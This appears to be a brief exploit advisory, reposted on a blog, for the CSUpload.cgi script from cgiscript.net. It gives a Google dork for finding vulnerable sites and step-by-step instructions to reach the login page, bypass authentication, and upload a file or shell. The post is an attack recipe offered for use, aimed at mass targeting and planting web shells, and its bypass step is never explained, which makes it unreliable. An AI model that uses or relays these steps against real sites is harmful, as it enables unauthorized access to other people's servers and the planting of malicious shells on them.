Google Dork:CSUpload.cgi?command=
Date:4/9/2014
Exploit Author:Satanic2000
Vendor Homepage:http://www.cgiscript.net
Software Link:http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
Tested on:linux
Exploit:
vuln:
Site.com/[path]/CSUpload/CSUpload.cgi[path] :/cgi-script/ or /cgi-bin/ or None
Example:
1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login
2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi
3- Select Database Select Databases And Upload (File,Or Shell)
Thanks :-)
No comments:
Post a Comment